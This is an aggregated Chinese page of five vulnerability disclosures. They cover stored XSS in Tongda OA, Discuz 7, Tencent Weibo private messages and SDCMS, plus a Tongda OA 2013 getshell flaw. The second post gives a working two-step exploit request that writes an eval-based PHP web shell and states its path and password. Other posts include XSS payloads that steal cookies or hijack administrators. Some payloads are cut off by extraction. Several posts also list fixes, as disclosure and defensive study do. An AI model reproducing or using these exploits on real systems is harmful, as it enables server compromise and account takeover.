通达OA日志内容存储型XSS 可获取cookie漏洞预警
“爹只是小号罢了”通过精心收集,向本站投稿了5篇通达OA日志内容存储型XSS 可获取cookie漏洞预警,下面是小编为大家整理后的通达OA日志内容存储型XSS 可获取cookie漏洞预警,以供大家参考借鉴!
篇1:通达OA日志内容存储型XSS 可获取cookie漏洞预警
通达OA和版本,Office Anywhere 2013工作日志编辑页面存在存储型XSS,上级领导查看日志后能,可窃取到cookie
1、工作日志编辑页面 源码 绕过bypass 字符可构造XSS!
1、截取到得cookie
2、利用Cookie Injector 在支持同源策略条件下,替换cookie 登陆到Cookie用户ceshi2.
修复方案:
1、工作日志内容编辑页面过滤
2、http-only
篇2:通达OA 2013 通杀GETSHELL修复补丁漏洞预警
此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很 , 所以注入方面就不考虑了.
EXP:
第一步: [GET]site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
第二步: [GET]site/general/email/index.php
SHELL: site/general/email/shell.php 密码C
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
篇3:discuz! 7.* 存储型xss漏洞预警
发帖flash 地址处过滤不严,导致存储型xss,
document.write(AC_FL_RunContent('width', '550', 'height', '400', 'allowNetworking', 'internal', 'allowScriptAccess', 'never', 'src', 'aaaaaaaaaaaaa', 'quality', 'high', 'bgcolor', '#ffffff', 'wmode', 'transparent', 'allowfullscreen', 'true'));
如上,有一处输出在js 中,如果单引号没有过滤的话...
修复方案:
www.discuz.net/thread-3241166-1-1.html
篇4: 私信存储型XSS跨站漏洞漏洞预警
漏洞标题: 私信存储型XSS跨站漏洞
漏洞类型:xss跨站脚本攻击
危害等级:高
简要描述:
最近大家都流行连载了,
私信存储型XSS跨站漏洞漏洞预警
。那么我们也开场吧~最近心伤的胖子一直在连载,不知道发重复了没。
详细说明:
漏洞成因:
缺陷文件:
mat1.gtimg.com/www/mb/js/mi_121016.js
1.首先进入MI.TalkList.picEvent函数
MI.TalkList.picEvent=function(a){
....
其中a为页面中所有class为PicBox的div集合,即div.PicBox
2.循环每一个class为PicBox的div
for(varb=0,f=a.length;b
varg=a[b],
....
g为每个div
3.k=c(g,“img”)[0],获取PicBox里的第一个img图片
4.h=k.parentNode,获取k的父级元素,是一个链接
5.j=c(g,“.picTools”),获取PicBox这个div里的picToolsDIV
6.缺陷在下面这几句JS代码
if(!MI.user.fun.wideStyle)
MI.tmpl.picTool=['',_(“向左转”),'|',_(“向右转”),'',_(“查看原图”),“
”].join(“”);
UI.before(UI.html(MI.tmpl.picTool.replace(“$Url”,h.href.replace(/\/460$/g,“”)).replace(“$hisUrl”,l))[0],h);
MI.tmpl.picTool直接将$Url替换为h.href
而h在取href属性值时,会自动将“等转换回”,<,>等符号,
----------------------------------
结合实际HTML结构,如下:
k对应用户发送的图片
h对应k外层的A标签
...
h.href中的“<,>等重新转义回了”,<,>
最终导致UI.html(MI.tmpl.picTool.replace(“$Url”,h.href.replace(/\/460$/g,“”)).replace(“$hisUrl”,l))[0],h)
在输出HTML时,导致XSS出现
--------------------------------
利用方法,发送私信时,
api.t.qq.com/inbox/pm_mgr.php
sourcereply
ptidgainover
roomid
content.................
fid
arturlt2.qpic.cn/mblogpic/4955e75656b3d175296c/460#“>
(document.cookie);” style=“display:none”>
murl
targetgainover
funcsendefjs
pmlangzh_CN
apiType8
apiHostapi.t.qq.com
漏洞证明:
对方打开私信时会触发XSS。
修复方案:
MI.TalkList.picEvent中 h.href.replace之前先将h.href转义一次~
篇5:SDCMS某处存储型xss可劫持管理员漏洞预警
SDCMS某处存储型xss,可跨进后台直接劫持管理员
问题还是在短消息处,
SDCMS某处存储型xss可劫持管理员漏洞预警
,
之前SDCMS短消息处存在xss可以直接劫持任意指定用户,这个bug修改了,但是没有修复完全,这次来个更狠的,直接劫持管理员账户。
首先,我们发送短消息给任意存在的用户,这里我们用222222给111111账户发消息:
发送的内容我们填写
">
管理员后台查看后会触发
【通达OA日志内容存储型XSS 可获取cookie漏洞预警】相关文章:






文档为doc格式